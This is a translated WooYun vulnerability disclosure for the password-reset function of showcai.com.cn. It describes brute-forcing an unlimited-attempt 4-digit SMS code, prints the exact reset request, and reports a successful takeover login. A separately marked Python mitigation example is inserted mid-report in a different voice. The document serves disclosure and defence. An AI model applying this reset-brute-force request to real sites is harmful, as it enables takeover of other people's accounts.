WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops article online reader -------- http://drop.zone.ci/
2016-01-02: Details reported to the vendor, awaiting vendor handling
2016-01-04: Vendor confirmed; details disclosed to the vendor only
2016-01-14: Details disclosed to core white hats and experts in the relevant field
2016-01-24: Details disclosed to regular white hats
2016-02-03: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public
Happy New Year~
http://www.showcai.com.cn/dwzq_front/index/indexInfo
http://www.showcai.com.cn/dwzq_front/resetPassword/getPage?mobile=
Enter a phone number to request a verification code, fill in a new password, and then brute-force the code. Testing confirmed that the verification code is 4 numeric digits; the code stays valid long enough to try every combination, and there is no limit on the number of attempts.
GET /dwzq_front/resetPassword/userResetPassword?mobile=手机号&authCode=验证码&password=新密码&_=1451643718331 HTTP/1.1
Host: www.showcai.com.cn
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.69 Safari/537.36 QQBrowser/9.1.4060.400
Referer: http://www.showcai.com.cn/dwzq_front/resetPassword/getPage?mobile=
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=E7462A4F931D752791CEEA0B8EC44B23; Hm_lvt_1ef4dcfc6a759a178be333c4c9d1f5e1=1451636785; Hm_lpvt_1ef4dcfc6a759a178be333c4c9d1f5e1=1451643719
OK, now try logging in with the new password. Login succeeded~
Strengthen the verification code or add a limit on the number of attempts.
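The fix suggestion above, worked through as an added example (this is not code from the report or from the showcai.com.cn site): a minimal in-memory model of a password-reset verification-code flow that closes the three gaps the report found, namely a short 4-digit code space, a validity window long enough to exhaust it, and no cap on attempts. The policy numbers (6 digits, 300-second expiry, 5 attempts per code, 60-second resend cooldown) and the class and function names are assumptions chosen for illustration, not the site's real settings.

```python
import hmac
import secrets
import time
from dataclasses import dataclass

# Assumed policy values for this example, not the site's actual configuration.
CODE_DIGITS = 6           # the report found a 4-digit code (only 10,000 possibilities)
CODE_TTL_SECONDS = 300    # short validity window instead of one long enough to brute-force
MAX_ATTEMPTS = 5          # guesses allowed per issued code before it is invalidated
MIN_RESEND_INTERVAL = 60  # seconds that must pass before another code goes to the same number


@dataclass
class IssuedCode:
    code: str
    issued_at: float
    attempts: int = 0
    used: bool = False


class ResetCodeService:
    """Hypothetical verification-code service; state lives in a dict for the example."""

    def __init__(self, clock=time.time):
        self.clock = clock            # injectable so expiry can be tested deterministically
        self.codes: dict[str, IssuedCode] = {}

    def send_code(self, mobile: str) -> str:
        """Issue a fresh random code for `mobile`, enforcing a resend cooldown.

        Returns the code only so the caller can play the role of the SMS channel;
        a real service would hand it to the SMS gateway and never return it.
        """
        now = self.clock()
        prev = self.codes.get(mobile)
        if prev is not None and now - prev.issued_at < MIN_RESEND_INTERVAL:
            raise RuntimeError("resend cooldown in effect")
        # secrets.randbelow is a CSPRNG; zero-pad so every code is exactly CODE_DIGITS long
        code = str(secrets.randbelow(10 ** CODE_DIGITS)).zfill(CODE_DIGITS)
        self.codes[mobile] = IssuedCode(code=code, issued_at=now)
        return code

    def verify(self, mobile: str, candidate: str) -> bool:
        """Check one guess. Every call spends attempt budget, and the code is
        discarded on expiry, on exhaustion of the budget, and after a success."""
        entry = self.codes.get(mobile)
        if entry is None or entry.used:
            return False
        if self.clock() - entry.issued_at > CODE_TTL_SECONDS:
            del self.codes[mobile]    # expired: the user must request a new code
            return False
        entry.attempts += 1
        if entry.attempts > MAX_ATTEMPTS:
            del self.codes[mobile]    # budget exhausted: invalidate regardless of the guess
            return False
        # constant-time comparison so response timing does not leak matching digits
        if hmac.compare_digest(entry.code, candidate):
            entry.used = True         # single use
            return True
        return False


def blind_guess_bound(digits: int, attempts: int) -> float:
    """Upper bound on the probability that blind guessing succeeds within
    `attempts` tries against a uniformly random `digits`-digit code."""
    return min(1.0, attempts / 10 ** digits)
```

With the reported configuration, `blind_guess_bound(4, 10000)` is 1.0: an unlimited number of attempts within the validity window guarantees success. With the assumed policy, `blind_guess_bound(6, 5)` is 5e-06 per issued code, and the resend cooldown keeps an attacker from cheaply rolling the dice again.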
Severity: Low
Vulnerability Rank: 5
Confirmation time: 2016-01-04 10:23
This is another site belonging to the company, not the official website; the relevant personnel have been contacted to handle it.
None yet